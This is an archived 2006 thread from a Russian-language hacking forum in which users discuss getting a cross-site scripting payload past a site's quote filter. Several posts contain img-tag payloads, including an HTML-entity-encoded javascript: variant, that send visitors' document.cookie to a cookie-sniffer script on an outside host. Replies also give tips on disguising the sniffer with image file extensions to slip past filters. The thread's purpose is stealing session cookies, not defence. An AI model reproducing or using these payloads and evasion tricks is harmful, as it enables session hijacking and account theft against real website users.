ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Обойти фильтрацию!
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Обойти фильтрацию!
  #1  
Старый 31.01.2006, 17:51
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию Обойти фильтрацию!
Подскажите как обойти следующую фильтрацию:

До фильтрации:
<img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>

или
<img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>

После фильтрации:

<img src=/'http://store-room.h15.ru/sniff/sniff.php?/'+document.cookie></img>

Как бы это обойти?
 

  #2  
Старый 31.01.2006, 19:18
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию
мдя.... имхо тебе этот код ничего не даст. Надо чтобы текст интерпритировался браузером как ЯваКод. А тут просто адрес. И на снифф тебе придет ИП, реферер, а вместо кук document.cookie
 

  #3  
Старый 31.01.2006, 19:43
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
По умолчанию
Цитата:
Сообщение от NeX  
Подскажите как обойти следующую фильтрацию?
Мдя....эт точно!

Сниффер возвращает браузеру прозрачный GIF-файл размером 1x1 px. Это позволяет вызывать сниффер как непосредственно по ссылке в теге <a>, так и в качестве src тега <img>. Сам сниффер имеет расширение .jpg, что позволяет использовать его в обход фильтров, пропускающих только адреса картинок. А у тебя что??
Цитата:
<img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>
расширения php. Так не получется или я что то не так понял...щас не могу думать голова забита (
 

  #4  
Старый 31.01.2006, 21:39
pch
Познающий
Регистрация: 22.10.2005
Сообщений: 37
Провел на форуме:
520745

Репутация: 141
По умолчанию
Попробуй
Код:
<img  src=javascript:aa=new&#x20;Image();aa.src=&quot;http://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>
 

  #5  
Старый 01.02.2006, 14:39
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию
Цитата:
Сообщение от pch  
Попробуй
Код:
<img  src=javascript:aa=new&#x20;Image();aa.src=&quot;http://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>
че то не сработало =( Дай свою асю, поговорить надо.
 

  #6  
Старый 01.02.2006, 14:49
Xxor
Познающий
Регистрация: 24.01.2006
Сообщений: 33
Провел на форуме:
413899

Репутация: 10
Отправить сообщение для Xxor с помощью ICQ
По умолчанию
Юзай античатовский снифер он с расшырением .gif должно пропустить
 

  #7  
Старый 02.02.2006, 11:33
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию
Короче теперь такая трабла, вроде обошел фильтрацию вот этим:

<img src=javascript:aa=new&#x20;Image();aa.src=&quot;ht tp://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>

но он не хочет выполняться =( куки не приходят =(. Также пробовал с античатовским снифером ни хрена!
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ